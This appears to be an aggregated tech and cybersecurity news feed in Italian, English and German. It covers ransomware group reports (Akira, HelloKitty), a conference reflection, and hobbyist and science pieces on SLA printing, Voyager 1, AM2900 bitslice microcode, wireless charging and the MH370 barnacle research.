Ecco una grande dote delle personalità intervistate: la lungimiranza e la capacità visione strategica. Sono tutte persone che per arrivare dove sono oggi si sono prese grandi responsabilità e che nelle cose che fanno ci mettono cuore, mani e testa. Tra loro cito: Antonio Capobianco, CEO di FATA Informatica, Mario Nobile, Direttore Generale dell’Agenzia per l’Italia Digitale (Agid), Umberto Rosini, Direttore Sistemi Informativi alla Presidenza del Consiglio dei Ministri – Dipartimento della Protezione Civile, Marco Molinaro, Security lead di Accenture per l’Italia, il centro Europa e la Grecia e Martino Bevacqua Senior Manager di Accenture Security, Gianluca Tirozzi, co-funder di BitCorp, il magnifico Paolo Galdieri, avvocato penalista, Cassazionista e docente di Diritto penale dell’informatica, David Cenciotti, ex Ufficiale di complemento dell’Aeronautica Militare e giornalista, fondatore di “The Aviationist”, uno dei siti di aviazione più autorevoli al mondo, il mitico Corrado Giustozzi, Cyber security strategist, consulente strategico, docente e divulgatore, Filippo Bonativicola, Security manager.

Con loro abbiamo spaziato dalla governance del digitale, ai sistemi logistici, dal crimine informatico ai dati geospaziali e l’intelligence per la pianificazione delle operazioni militari, abbiamo parlato di errori e sfide, ma anche di opportunità, di computer quantistici e droni in volo, di Medio Oriente e di Italia, soprattutto della nostra Italia, dei suoi ragazzi e degli scenari futuri. E poi a qualcuno abbiamo chiesto chi è davvero l’hacker?

Le risposte vi sorprenderanno, come lo hanno fatto con me e presto potrete sentirli parlare attraverso la condivisione delle video interviste. Non voglio rovinare la sopresa. Quindi vi racconterò che cosa ho imparato nei 2 giorni di conferenza e sulla tangenziale.

La realtà non è mai da interpretare attraverso la lente del sè

La realtà non è mai da interpretare attraverso la lente del sè: lo insegna l’intelligence, che attraverso il metodo scientifico seleziona le “informazioni” utili per poi prendere quelle importanti decisioni relative ad ogni singolo interesse nazionale.

L’ego non deve mai prevalere, perchè spinge a concentrarci su noi stessi invece che un obiettivo comune e perchè crea quel “bullismo intellettuale”, evidenziato da Christian Espinosa, ingegnere di sicurezza informatica – e autore di “The smartest person in the room” – come il motivo per cui potremmo perdere la guerra nella sicurezza informatica.

Ecco perchè la mia storia sulla tangenziale voleva avere un senso. Potevo permettere al mio ego di governarmi, oppure potevo metterlo da parte e cercare di agire nel modo più sicuro possibile, oppure cercando di non intepretare quel momento come offesa personale o di diventare arrogante come quelle persone che sono convinte di non sbagliare mai nel giudicare il comportamento di qualcuno.

Perchè alla base di quel comporamento che infrangeva le regole poteva esserci un padre in ansia per un figlio, o qualcuno al quale la giornata non era andata come sperava. E’ vero, superare certi limiti spesso significa mettere a rischio gli altri e noi stessi e le regole vanno rispettate, ma togliersi dal centro riesce soprattutto nel campo della sicurezza informatica a rendere le attività più sicure. Questo si può applicare anche al mondo virtuale, ai social media ad esempio, al rapporto con la nostra soggettività.

Dall’altra parte abbiamo di fronte a noi la scelta di essere un pò più consapevoli del mondo che ci circonda, che che ogni azione che noi facciamo ha dirette conseguenza con la rete di persone che ci sta vicino, i loro dati, la loro sicurezza, la loro reputazione. Soprattutto quando io scrivo di geopolitica, correlata al mondo cyber, devo sempre tenere bene in mente che “quando mi sento certa di qualcosa, risulta il più delle volte matematicamente sbagliata” e che il confronto non può mai mancare.

Lungimiranza e 404

In questo mondo, dove l’errore c’è sempre stato e sempre ci sarà e che spesse volte ha portato alla scoperta e alla crescita, dobbiamo rendercI conto che la tecnologia ci porta grandissimi vantaggi ma anche ogni sorta di problema. Abbiamo programmato una macchina di cui conosciamo tutti i pezzi e “comprendiamo tutte le parti, ma la stiamo utilizzando in modi decisamente differenti dall’uso previsto”, (Danny Hillis, The Internet could crash). Ed è vero, spesso la usiamo con superficialità, siamo un pò indietro, ma l’importante è non gettarsi da grandi altezze senza avere un paracadute o un metodo per gestire l’incertezza.
E come se ne esce? Ascoltate sempre chi ne sa davvero più di voi, come quando eravate bambini e iniziavate un sacco di domande con “perché?”. Fate domande profonde, intelligenti ed oneste, cercate la coerenza e considerate la risposte alternative. E’ davvero semplice secondo Richard Feynman: “Per cercare di risolvere il problema, credo che la cosa migliore sia quella di riunire intorno a voi una tavola di esperti, gente che ne sappia qualcosa, e studiare insieme cosa è stato fatto in passato. Ci vorrà del tempo, ma poi arriveremo a una soluzione ragionevole”. E questo è quello che ha cercato di fare Red Hot Cyber, durante la conferenza.

A proposito trovate anche il tempo per leggere “Il senso delle cose” di Richard Feynman, “Favole al telefono” di di Gianni Rodari e “Questa è l’acqua” di David Foster Wallace e non dimenticate la fantascienza, perché alcuni grandi scrittori ci hanno raccontato già negli anni ’50 le minacce che stiamo vivendo oggi. Ha! Non dimenticatevi di leggere Red Hot Cyber!

L'articolo Lungimiranti: gli “uomini straordinari” ospiti della Red Hot Cyber Conference 2024 proviene da il blog della sicurezza informatica.

Cybersecurity & cyberwarfare

2024-04-23 05:20:59

Akira: un ransomware da pole position! 250 organizzazioni colpite e 42 milioni di dollari di riscatto

Dall’inizio del 2023, il ransomware Akira ha compromesso le reti di oltre 250 organizzazioni e raccolto circa 42 milioni di dollari in riscatti, secondo una dichiarazione congiunta di FBI, CISA, Centro europeo per la criminalità informatica (EC3) di Europol e National Cyber ​​Security Centro dei Paesi Bassi (NCSC-NL).

Il ransomware Akira è emerso a marzo 2023 e ha rapidamente guadagnato notorietà, attaccando vittime in vari settori in tutto il mondo. Nel giugno 2023, gli sviluppatori del malware avevano creato un ransomware Linux per le macchine virtuali VMware ESXi, ampiamente utilizzate negli ambienti aziendali.

Secondo gli esperti, gli operatori di Akira richiedono in media alle vittime un riscatto che varia da 200.000 a diversi milioni di dollari, a seconda delle dimensioni dell’organizzazione hackerata. Come riferiscono ora le forze dell’ordine, a partire dal 1° gennaio 2024, il gruppo ha attaccato 250 organizzazioni in Nord America, Europa e Australia e ha chiesto alle vittime un riscatto per circa 42 milioni di dollari.

Ad esempio, nel dicembre 2023, i rappresentanti di Akira hanno segnalato un attacco ai sistemi Nissan in Australia e Nuova Zelanda e la società ha successivamente confermato una fuga di dati di 100.000 persone. Akira ha recentemente violato anche l’Università di Stanford, che il mese scorso aveva avvertito di una violazione dei dati che avrebbe interessato le informazioni personali di 27.000 persone.

In totale, dalla sua nascita nel 2023, il gruppo ha segnalato attacchi contro più di 230 organizzazioni sul suo sito web nella underground. Le forze dell’ordine hanno incluso gli indicatori di compromissione (IoC) di Akira nel loro rapporto, nonché informazioni sulle tattiche e sui metodi utilizzati dal gruppo che sono stati identificati durante le indagini dell’FBI a partire dal febbraio 2024.

Pertanto, è stato riferito che per l’accesso iniziale alle reti prese di mira, gli operatori del malware prendono di mira i servizi VPN privi di autenticazione a più fattori, utilizzando principalmente vulnerabilità note nei prodotti Cisco (come CVE-2020-3259 e CVE-2023-20269). Inoltre, gli hacker utilizzano spesso il Remote Desktop Protocol (RDP), lo spear phishing e credenziali valide per accedere agli ambienti delle vittime.

Per aumentare i privilegi, gli aggressori utilizzano soluzioni come Mimikatz e LaZagne, mentre Windows RDP viene utilizzato principalmente per gli spostamenti laterali all’interno della rete della vittima. L’esfiltrazione dei dati viene effettuata utilizzando FileZilla, WinRAR, WinSCP e RClone.

L'articolo Akira: un ransomware da pole position! 250 organizzazioni colpite e 42 milioni di dollari di riscatto proviene da il blog della sicurezza informatica.

Cybersecurity & cyberwarfare

2024-04-23 05:00:58

Dual-Wavelength SLA 3D Printing: Fast Continuous Printing With ROMP And RFP Resins

As widespread as 3D printing with stereolithography (SLA) is in the consumer market, these additive manufacturing (AM) machines are limited to a single UV light source and the polymerization of free-radical polymerization (FRP) resins. The effect is that the object is printed in layers, with each layer adhering not only to the previous layer, but also the transparent (FEP or similar) film at the bottom of the resin vat. The resulting peeling of the layer from the film both necessitates a pause in the printing process, but also puts significant stress on the part being printed. Over the years a few solutions have been developed, with Sandia National Laboratories’ SWOMP technology (PR version) being among the latest.

Unlike the more common FRP-based SLA resins, SWOMP (Selective Dual-Wavelength Olefin Metathesis 3D-Printing) uses ring-opening metathesis polymerization (ROMP), which itself has been commercialized since the 1970s, but was not previously used with photopolymerization in this fashion. For the monomer dicyclopentadiene (DCPD) was chosen, with HeatMet (HM) as the photo-active olefin metathesis catalyst. This enables the UV-sensitivity, with an added photobase generator (PBG) which can be used to selectively deactivate polymerization.

General overview of SWOMP chemistry using HM as the catalyst and DCPD as the monomer. (Credit: Jeffrey C. Foster et al., Advanced Science, 2022, Sandia National Laboratories)
The advantage of DCPD is that this material and the resulting objects are significantly robust and are commonly thermally post-cured (250 °C for 30 seconds for the dogbones in this experiment) to gain their full mechanical properties. Meanwhile the same dual-wavelength setup is used for continuous SLA printing as previously covered by e.g. [Martin P. de Beers] and colleagues in a 2019 paper in Science Advances. Not only does the photoinhibitor with FRP and ROMP resins prevent the attachment of polymerized resin onto the transparent film or window, due to the localized control of the photoinhibitation depth dual-wavelength SLA is not limited to single layers, but can print entire topological features in a single pass.

This method might therefore be better than both existing FRP-based mono-wavelength SLA, and the proprietary CLIP technology by Carbon with its oxygen-permeable membrane, with no peeling and with print speeds of many times that of conventional SLA. Currently Sandia is looking for partners to develop and commercialize this technology, raising the hope that such dual-wavelength SLA printers may make it onto the market by manufacturers which do not require a security clearance and/or proof of financial liquidity before you even get to talk to a salesperson.

Cybersecurity & cyberwarfare

2024-04-23 05:08:17

Rebranding di HelloKitty: ora HelloGookie! Password di CD Projekt Red e dati Cisco rivelati!

Gli autori del ransomware HelloKitty hanno annunciato il cambio di nome in HelloGookie e hanno pubblicato le password di CD Projekt Red e i dati Cisco precedentemente pubblicati online, nonché le chiavi di decrittazione per vecchi attacchi.

L’aggressore che ha fatto questa dichiarazione è noto come Gookee e kapuchin0. Sostiene di essere il creatore del malware HelloKitty.

Ricordiamo che il ransomware HelloKitty è apparso nel 2020 e ha attaccato attivamente le reti aziendali, rubando dati e crittografando i sistemi. Il primo attacco di alto profilo del gruppo è avvenuto nel febbraio 2021, quando gli hacker hanno violato CD Projekt Red , il creatore dei giochi Cyberpunk 2077, Witcher 3 e Gwent, crittografando i server dell’azienda e rubando i codici sorgente. I rappresentanti di HelloKitty hanno successivamente dichiarato di aver venduto la merce rubata nelle underground.

Nel 2022, un altro gruppo di ransomware, Yanluowang, è stato violato . Quindi, a causa dei registri delle chat interne trapelate, si è saputo che Yanluowang potrebbe essere strettamente associato allo sviluppatore HelloKitty, che utilizzava il soprannome Guki nelle conversazioni.

Lo scorso autunno, il codice sorgente di HelloKitty è stato pubblicato su un forum di hacking in lingua russa . Quindi il presunto autore del malware, nascosto sotto kapuchin0, ha detto che stava sviluppando un nuovo crittografo più potente e che non aveva più bisogno di HelloKitty.

Come scrive ora il ricercatore sulla sicurezza informatica 3xp0rt , il recente “rebranding” del ransomware in HelloGookie è stato contrassegnato dal lancio di un nuovo Data Leak Site (DLS) nelle darknet.

Per celebrare il lancio, gli operatori di ransomware hanno pubblicato su una nuova risorsa quattro chiavi di decrittazione private per le versioni precedenti di HelloKitty, che possono essere utilizzate per decrittografare i file colpiti da attacchi passati.

Sono state rilasciate anche informazioni interne rubate a Cisco durante l’attacco del 2022, nonché password per il codice sorgente di Gwent, Witcher 3 e Red Engine rubate a CD Projekt Red.

Bleeping Computer riporta che un rappresentante del gruppo che ha compilato Witcher 3 da fonti trapelate, noto con il soprannome di sventek, ha affermato che la fuga di notizie rappresenta 450 GB di dati e contiene il codice sorgente di Witcher 3, Gwent, Cyberpunk, vari SDK per console (PS4/PS5 XBOX NINTENDO), così come alcuni log di build.

In particolare, il dump contiene file binari che consentono agli sviluppatori di eseguire una build di Witcher 3.
Screenshot di una build di Witcher 3 realizzata con il codice sorgente trapelato
Per quanto riguarda i dati rubati a Cisco, la fuga di notizie contiene un elenco di hash NTLM (NT LAN Manager) presumibilmente estratti durante l’hacking dei sistemi dell’azienda. Nel 2022, Cisco ha ammesso di essere stata attaccata dal gruppo Yanluowang. Successivamente è stato affermato che l’incidente si sarebbe limitato al furto di dati minori da un account.

Come notano i giornalisti, l’accesso di kapuchin0 a questi dati indica una cooperazione più stretta tra Yanluowang e HelloKitty di quanto si pensasse in precedenza.

L'articolo Rebranding di HelloKitty: ora HelloGookie! Password di CD Projekt Red e dati Cisco rivelati! proviene da il blog della sicurezza informatica.

Cybersecurity & cyberwarfare

2024-04-23 02:00:58

Optical Tweezers Investigate Tiny Particles

No matter how small you make a pair of tweezers, there will always be things that tweezers aren’t great at handling. Among those are various fluids, and especially aerosolized droplets, which can’t be easily picked apart and examined by a blunt tool like tweezers. For that you’ll want to reach for a specialized tool like this laser-based tool which can illuminate and manipulate tiny droplets and other particles.

[Janis]’s optical tweezers use both a 170 milliwatt laser from a DVD burner and a second, more powerful half-watt blue laser. Using these lasers a mist of fine particles, in this case glycerol, can be investigated for particle size among other physical characteristics. First, he looks for a location in a test tube where movement of the particles from convective heating the chimney effect is minimized. Once a favorable location is found, a specific particle can be trapped by the laser and will exhibit diffraction rings, or a scattering of the laser light in a specific way which can provide more information about the trapped particle.

Admittedly this is a niche tool that might not get a lot of attention outside of certain interests but for those working with proteins, individual molecules, measuring and studying cells, or, like this project, investigating colloidal particles it can be indispensable. It’s also interesting how one can be built largely from used optical drives, like this laser engraver that uses more than just the laser, or even this scanning laser microscope.

https://www.youtube.com/embed/G7LzygHHfaw?feature=oembed

Cybersecurity & cyberwarfare

2024-04-22 23:00:44

NASA’s Voyager 1 Resumes Sending Engineering Updates to Earth

After many tense months, it seems that thanks to a gaggle of brilliant engineering talent and a lucky break the Voyager 1 spacecraft is once more back in action. Confirmation came on April 20th, when Voyager 1 transmitted its first data since it fell silent on November 14 2023. As previously suspected, the issue was a defective memory chip in the flight data system (FDS), which among other things is responsible for preparing the data it receives from other systems before it is transmitted back to Earth. As at this point in time Voyager 1 is at an approximate 24 billion kilometers distance, this made for a few tense days for those involved.

The firmware patch that got sent over on April 18th contained an initial test to validate the theory, moving the code responsible for the engineering data packaging to a new spot in the FDS memory. If the theory was correct, this should mean that this time the correct data should be sent back from Voyager. Twice a 22.5 hour trip and change through Deep Space and back later on April 20th the team was ecstatic to see what they had hoped for.

With this initial test successful, the team can now move on to moving the remaining code away from the faulty memory after which regular science operations should resume, and giving the plucky spacecraft a new lease on life at the still tender age of 46.

Cybersecurity & cyberwarfare

2024-04-22 20:00:54

Ancient Cable Modem Reveals Its RF Secrets

Most reverse engineering projects we see around here have some sort of practical endpoint in mind. Usually, but not always. Reverse-engineering a 40-year-old cable modem probably serves no practical end, except for the simple pleasure of understanding how 1980s tech worked.

You’ll be forgiven if the NABU Network, the source of the modem [Jared Boone] tears into, sounds unfamiliar; it only existed from 1982 to 1985 and primarily operated in Ottawa, Canada. It’s pretty interesting though, especially the Z80-based computer that was part of the package. The modem itself is a boxy affair bearing all the hallmarks of 1980s tech. [Jared]’s inspection revealed a power supply with a big transformer, a main logic board, and a mysterious shielded section with all the RF circuits, which is the focus of the video below.

Using a signal generator, a spectrum analyzer, and an oscilloscope, not to mention the PCB silkscreen and component markings, [Jared] built a block diagram of the circuit and determined the important frequencies for things like the local oscillator. He worked through the RF section, discovering what each compartment does, with the most interesting one probably being the quadrature demodulator. But things took a decidedly digital twist in the last compartment, where the modulated RF is turned into digital data with a couple of 7400-series chips, some comparators, and a crystal oscillator.

This tour of 80s tech and the methods [Jared] used to figure out what’s going on in this box were pretty impressive. There’s more to come on this project, including recreating the original signal with SDRs. In the mean time, if this put you in the mood for other videotext systems of the 80s, you might enjoy this Minitel terminal teardown.

https://www.youtube.com/embed/8IflOWH8fzY?feature=oembed

Cybersecurity & cyberwarfare

2024-04-22 18:30:00

AI + LEGO = A Brickton of Ideas

What if there was some magic device that could somehow scan all your LEGO and tell you what you can make with it? It’s a childhood dream come true, right? Well, that device is in your pocket. Just dump out your LEGO stash on the carpet, spread it out so there’s only one layer, scan it with your phone, and after a short wait, you get a list of all the the fun things you can make. With building instructions. And oh yeah, it shows you where each brick is in the pile.

We are talking about the BrickIt app, which is available for Android and Apple. Check it out in the short demo after the break. Having personally tried the app, we can say it does what it says it does and is in fact quite cool.

As much as it may pain you to have to pick up all those bricks when you’re finished, it really does work better against a neutral background like light-colored carpet. In an attempt to keep the bricks corralled, we tried a wooden tray, and it didn’t seem to be working as well as it probably could have — it didn’t hold that many bricks, and they couldn’t be spread out that far.

And the only real downside is that results are limited because there’s a paid version. And the app is kind of constantly reminding you of what you’re missing out on. But it’s still really, really cool, so check it out.

We don’t have to tell you how versatile LEGO is. But have you seen this keyboard stand, or this PCB vise?

https://www.youtube.com/embed/aW_hv165uNc?feature=oembed

Thanks to [Keith Olson] for the tip!

Cybersecurity & cyberwarfare

2024-04-22 17:00:38

Slicing and Dicing the Bits: CPU Design the Old Fashioned Way

Writing for Hackaday can be somewhat hazardous. Sure, we don’t often have to hide from angry spies or corporate thugs. But we do often write about something and then want to buy it. Expensive? Hard to find? Not needed? Doesn’t really matter. My latest experience with this effect was due to a recent article I wrote about the AM2900 bitslice family of chips. Many vintage computers and video games have them inside, and, as I explained before, they are like a building block you use to build a CPU with the capabilities you need. I had read about these back in the 1970s but never had a chance to work with them.

As I was writing, I wondered if there was anything left for sale with these chips. Turns out you can still get the chips — most of them — pretty readily. But I also found an eBay listing for an AM2900 “learning and evaluation kit.” How many people would want such a thing? Apparently enough that I had to bid a fair bit of coin to take possession of it, but I did. The board looked like it was probably never used. It had the warranty card and all the paperwork. It looked in pristine condition. Powering it up, it seemed to work well.

What Is It?

The board hardly looks at least 40 years old.
The board is a bit larger than a letter-sized sheet of paper. Along the top, there are three banks of four LEDs. The bottom edge has three banks of switches. One bank has three switches, and the other two each have four switches. Two more switches control the board’s operation, and two momentary pushbutton switches.

The heart of the device, though, is the AM2901, a 4-bit “slice.” It isn’t quite a CPU but more just the ALU for a CPU. There’s also an AM2909, which controls the microcode memory. In addition, there’s a small amount of memory spread out over several chips.

A real computer would probably have many slices that work together. It would also have a lot more microprogram memory and then more memory to store the actual program. Microcode is a very simple program that knows how to execute instructions for the CPU.

For example, suppose you wanted an instruction that added the A register to the B register and left the result in the A register. An imaginary microcode program might look like this:
Gate register A onto internal bus X
Gate register B onto internal bus Y
Set ALU to compute X+Y
Gate ALU output to register A

The microcode would normally also fetch the next instruction, too.

The kit lacks any program memory and only has 16 memory slots for microprogram steps. So, in reality, you can probably fake a single instruction and see how it works. But that’s about it. The example I’ll show you is a simple microprogram that converts an 8-bit BCD number into the equivalent binary number. That is, 2 and 8 will convert to 1 and C (since everything is 4-bit). Even this takes all the memory the device has. So don’t expect to emulate a VAX 11/730 (which did, incidentally, use 8 AM2901s).

How it Works

The board doesn’t have a microcontroller, so everything is ordinary logic. It is set up to work with 4-bit numbers and a 32-bit microcode word. Since board space and LEDs were expensive then, everything works with 4 bits at a time. The right-hand bank of switches (the mux select) lets you put a binary number from 000 to 111 (0-7), and that controls which 4-bit part you are working with at any given time.

The LEDs on the left show a data display. Exactly what this means depends on the position of the mux select switches. For example, when the switches are at 001, the data LEDs show the output of the ALU. When the switches are at 010, the ALU’s flags (for example, carry and zero) appear.

The other LEDs show four bits of the pipeline register — the instruction the board is about to execute — and the contents of the microprogram memory (again, the selected four bits).

When the Run/Load switch is set to the load position, you can enter an address on the left-hand switches, and data bits on the middle switches. Then you press Memory Load. That means to completely enter a 32-bit microinstruction, you have to flip the mux switches 8 times and then enter each 4-bit value, one at a time.

If you flip to run, you can use the single step button to execute an instruction, or you can hook up an external clock and use that.

This is all confusing to read about, but the video below will help you see how this old hardware works.

https://www.youtube.com/embed/S1mkKvfPSZ0?feature=oembed

Internals

Internally, you can see that the microprogram memory feeds the pipeline register. The address is from a multiplexer that can select an address from several sources. The pipeline register provides 32 bits that control everything from what the next address is to what the ALU does.
Block diagram of the board
There is a small PROM that serves as a lookup table to control the sequencer. This allows the instruction to use a small number of bits to control the AM2909 sequencer so that you can select the next address, have conditional jumps, or even push or pop the stack internal to the device.

Essentially, the sequencer decides what word to execute, the AM2901 does most of the execution, and the rest is just memory and a little glue logic.

In a real system, you have to account for things like the carry flags and detecting a zero result. However, having only one slice makes things easier. The carry input is part of the microinstruction so you decide when there’s a carry and when there isn’t.

Microinstructions

A scan of the manual’s microcode instruction reference
In a real design, the microinstruction size and format were totally up to you. However, since we are using the evaluation board, you must use that format (see the figure below). Each instruction had several major parts: a way to specify what instruction would happen next, a source, and a destination along with an operation. In addition, there were two register fields and a data field (all, of course, four bits). Not all fields are used in every case.

This is a very flexible arrangement because you can, for example, do adding, shifting, and a conditional jump all in one instruction. However, it can take some getting used to. For example, loading a register is usually done by using a logical OR instruction with a constant zero.

The other thing that is strange is the pipelining. Because everything is set up at the start, a conditional jump doesn’t apply to the line it is on but the line before. For example (in pseudo-code):
Goto next, set Q to A+1
If zero goto bump, set B to B+1

The “if” in the second line will trigger on the addition done in the first line.

Assembler

A small excerpt of the “assembler” spreadsheet
If you watch the video, you’ll see that entering a full program is tedious and error-prone. To help, I created an “assembler” using Google Sheets. You can use symbols for addresses, registers, and constants. In most places, you can use a drop-down to pick among options. There’s a place for comments, too.

Once it is filled in, you can hide the “source code” using Control+Alt+Shift+2. That gives you a handy piece to read or print for putting the data into the board. Control+Alt+Shift+1 will restore the display.

Address	Branch	Next	MUX	DEST	SRC	CARRY	ALU	A	B	D
0		CONTINUE		F->RAM (F)	D 0		R OR S		!ILSD	#Digit0
1		CONTINUE		F->RAM (F)	D 0		R OR S		!IMSD	#Digit1
2		CONTINUE		F->Q	D 0		R OR S			0
3		CONTINUE	2 – Double	2F, 2Q->RAM,Q	0 B		R OR S		!RES0

Consider the excerpt from the demo program above. The branch column could contain the next address to execute, but since each line has a continue, the address can be blank. The system will ignore it anyway.

To the right are the A, B, and D columns. The A and B columns are numbers from 0 to 15 signifying one of the ALU’s internal registers. Here, we don’t use A, so it is blank. The D field is for a four-bit constant if you need it.

The ALU column holds the operation to execute and the SRC column is what the inputs to that function are. In the first line, for example, we take D and OR it with zero. At address 3, however, the OR is between a zero and the contents of the B register.

The DEST column tells where the ALU result goes. In most of these lines, it goes to RAM, which is the register named in B. However, at address 2, the result goes to the Q register, which is internal to the AM2901. The destination for address 3 stores the result after doing a double (that is, 8-bit) shift to the left.

Obviously, a lot is going on here. If you want to know all about it, you’ll need to read the datasheets and the board manual. I’ve left those for you over on Hackaday.io. You’ll also find links to the assembler and some other material there.

Don’t have a board? No problem. I’ll make an emulator — also spreadsheet-based — available in the next installment along with more about the chip’s internals. If you missed the post that started me down this path, you can go back and read more about the internals and the device’s history. There are plenty of emulators for machines that used the AM2901, although they probably mimic the behavior, not the circuit.

Cybersecurity & cyberwarfare

2024-04-22 15:30:00

How Wireless Charging Works and Why It’s Terrible

Wireless charging is pretty convenient, as long as the transmitter and receiver speak the same protocol. Just put the device you want to charge on the wireless charger without worrying about plugging in a cable. Yet as it turns out, the disadvantages of wireless charging may be more severe than you think, at least according to tests by iFixIt’s [Shahram Mokhtari] and colleagues. In the article the basics of wireless charging are covered, as well as why wireless charging wastes a lot more power even when not charging, and why it may damage your device’s battery faster than wired charging.

The inefficiency comes mostly from the extra steps needed to create the alternating current (AC) with wireless coupling between the coils, and the conversion back to DC. Yet it is compounded by the issue of misaligned coils, which further introduce inefficiencies. Though various protocols seek to fix this (Qi2 and Apple’s MagSafe) using alignment magnets, these manage to lose 59% of the power drawn from the mains due to these inefficiencies. Wireless chargers also are forced to stay active, polling for a new device to charge, which keeps a MagSafe charger sucking up 0.2 W in standby.

If the losses from wired charging for a year come down to leaving a 10 W LED lamp on for eight hours total, wireless charging with MagSafe or Qi2 has you leaving that lamp on for 24 days straight. Since your phone is not a lamp, this means that much of this wasted power is dissipated as heat, both on the transmitting and receiving end. With the wireless receiving coil being placed practically on top of the battery in smartphones, this means that you are bumping the battery temperature up by about 8°C in the best scenario (fully aligned MagSafe/Qi2) over wired charging, and a sustained 40+°C in the case of a misaligned Qi charger, or the worst of all: the Tesla Charging Platform with its many overlapping coils.

Thus if plugging in a cable to connect a device is that much of a hassle, be sure to at the very least get a wireless charging solution that doesn’t simultaneously bump up your power bill and shorten the lifespan of the device’s battery.

https://www.youtube.com/embed/vhKVuT8-H1g?feature=oembed

FSFE Berlin

2024-04-12 06:21:21

Wie können wir die Digitalisierung nachhaltig gestalten?

Eine Antwort auf diese Frage will die Berliner Gruppe der FSFE auf dem Umweltfestival 2024 gemeinsam mit @Bits&Bäume Berlin und @KDE Eco aufzeigen. Kommt zu unserem Stand um mehr über nachhaltigen Umgang mit Computern mittels Freier Software zu erfahren. Außerdem haben wir informationen zu Upcycling Android, Public Money, Public Code und dem Fediverse mit am Stand.

Wir sind am 28.4. von 11 bis 19 Uhr auf der Straße des 17. Juni zwischen Siegessäule und Brandenburger Tor. Kommt vorbei, sprecht mit uns über Freie Software!

#freiesoftware #nachhaligkeit #FSFE #Berlin #Digitalisierung

UMWELTFESTIVAL 2024 am Brandenburger Tor

Straße frei für Umwelt, Natur und Klimaschutz. Am Sonntag, 28. April 2024 laden wir herzlich von zum 29. UMWELTFESTIVAL am Brandenburger Tor in Berlin -- Europas größte ökologische Erlebnismeile

^{www.umweltfestival.de}

Cybersecurity & cyberwarfare

2024-04-22 16:32:50

TikTok faces EU Commission’s second probe, potential suspension of reward program

The European Commission initiated a second formal proceeding against TikTok under the Digital Services Act on Monday (22 April), focusing on the launch of TikTok Lite in France and Spain, signalling intentions to suspend its "Reward Program" in the EU.

---

https://www.euractiv.com/section/platforms/news/tiktok-faces-eu-commissions-second-probe-potential-suspension-of-reward-program/

Cybersecurity & cyberwarfare

2024-04-22 14:00:35

The Hunt for MH370 Goes On With Barnacles As A Lead

On March 8, 2014, Malaysia Airlines Flight 370 vanished. The crash site was never found, nor was the plane. It remains one of the most perplexing aviation mysteries in history. In the years since the crash, investigators have looked into everything from ocean currents to obscure radio phenomena to try and locate the plane. All have thus far failed to find the wreckage.

It was on July 2015 when a flaperon from the aircraft washed up on Réunion Island. It was the first piece of wreckage found, and it was hoped it could provide clues to the airliner’s final resting place. While it’s yet to reveal a final answer as to the aircraft’s fate, some of the ocean life living on it could help investigators need to find the plane. The picture is murky right now, but in an investigation where details are scarce, every little clue helps.

Barnacles

A fragment of engine cowling believed to be from MH370, which washed up in December 2015. Note the barnacles covering the debris. Credit: ATSB
Today, there’s a general consensus that MH370 probably went down somewhere in the Indian Ocean. That’s supported both by analysis of satellite pings and the wreckage which washed up at Réunion. Notable on the wreckage was a small population of barnacles of the species Lepas anatifera.

David Griffin, an Australian government scientist, expressed optimism that these barnacles could help pinpoint the crash site. Similarly, American scientist Gregory Herbert thought much the same thing. Akin to the rings of a tree, the shells of the barnacle can reveal a history of the organism. By analyzing the found barnacles against their typical life cycle, they could potentially reveal details about where the wreckage had been.
By studying a barnacle’s shell, it’s possible to reconstruct the conditions of its growth. Credit: research paper
A great deal of research was undertaken to learn more about the species in the hope that better understanding the barnacles could help find the plane. As a species, Lepas anatifera proved to be uniquely perfect for further analysis. These barnacles tend to attach to floating debris, such as that generated by a catastrophic plane crash. Under stable conditions, the barnacles tend to grow at a fairly consistent rate. By looking at the oldest barnacles on the debris, one could try and estimate the length of time it had been in the water. Combining this with models of ocean currents could help figure out where a piece of debris might have come from.

Unfortunately, the innate variability of the sea organisms frustrated easy analysis. By growing their own barnacles in different conditions, researchers soon found that varying sea temperatures had a significant impact on growth size. As did the amount of nutrients available for the barnacles to feed on. Some researchers found that their barnacles maxed out at 20 mm in length after three months, while others grew barnacles over twice as long in a third of the time.
Scientist David Griffin pictured with a replica flaperon used in drift modelling studies by the CSIRO. Source: Peter Mathew via CSIRO
After much analysis and comparison of barnacle studies, initial optimism was dampened by the reality of the evidence. The largest barnacles on the flaperon suggested it had been floating for about four months — far less than the 16 months between the aircraft’s disappearance and the flaperon’s discovery. Indeed, similar results were found for other debris recovered since then, too. “Unfortunately for crash investigators, the new, faster Lepas growth rates suggest that the large (36 mm) Lepas found on the missing Malaysian Airline flight MH370 wreckage at Reunion Island – 16 months after the aircraft was believed to have crashed in 2014 – were much younger than previously realised,” said Iain Suthers, a researcher with the University of New South Wales who worked on barnacle studies.
In testing, it was found the flaperon floated in an orientation where much of it stuck out of the water. And yet, the flaperon was found with barnacles on these very surfaces. It’s a question that doesn’t have an easy answer at this stage. Credit: CSIRO
Other mysteries have presented baffling inconsistencies, too. When French researchers floated the flaperon in a tank to determine how it floated, they found one edge would consistently stick out of the water. This would be all well and good, except this surface was found covered in barnacles, too. This should have been impossible, as the barnacles cannot grow under these conditions.

There are still hopes that barnacle analysis could provide new areas for authorities to search for the plane. In concert with his research team, Herbert published a paper late last year positing a new drift path for the flaperon, based on barnacle studies. The paper lays out a deep analysis of a barnacle shell found on the MH370 flaperon debris. The shell’s makeup was used to determine the sea temperatures at different stages of the barnacle’s growth, based on established research into Lepas anatifera. This was then used to generate a reconstruction of the barnacle’s potential drift path through the ocean before it wound up on Réunion Island. The team hoped to repeat their analysis with larger barnacles from the flaperon debris, if they were to be released for analysis by French authorities.
Herbert’s research team used the sea surface temperature history baked into a barnacle’s shell to generate a new partial drift model for debris that washed up on Réunion Island. Credit: research paper

Grasping at (Very Scientific) Straws

It bears noting that these techniques aren’t the typical way that we hunt for crashed airliners. Normally, radar logs, transponder signals, and other data give us enough to go on to know where to look. In the case of MH370, much of that wasn’t available, meaning authorities and scientists had to get far more creative to hunt it down.

There are still some holes in the barnacle analysis as mentioned above. Plus, without access to all the barnacle evidence, researchers are naturally constrained. Ultimately, it’s an odd application of marine biology to try and solve an implacable mystery. It’s valid to try, but there’s no guarantee these small shelled organisms will turn up the plane that has so far proven impossible to find.

The ongoing investigation into MH370’s disappearance highlights the limitations and potential of using marine biology in solving such mysteries. Despite the advanced technologies and the novel application of biological data, significant gaps remain in our understanding of the debris’ drift patterns.

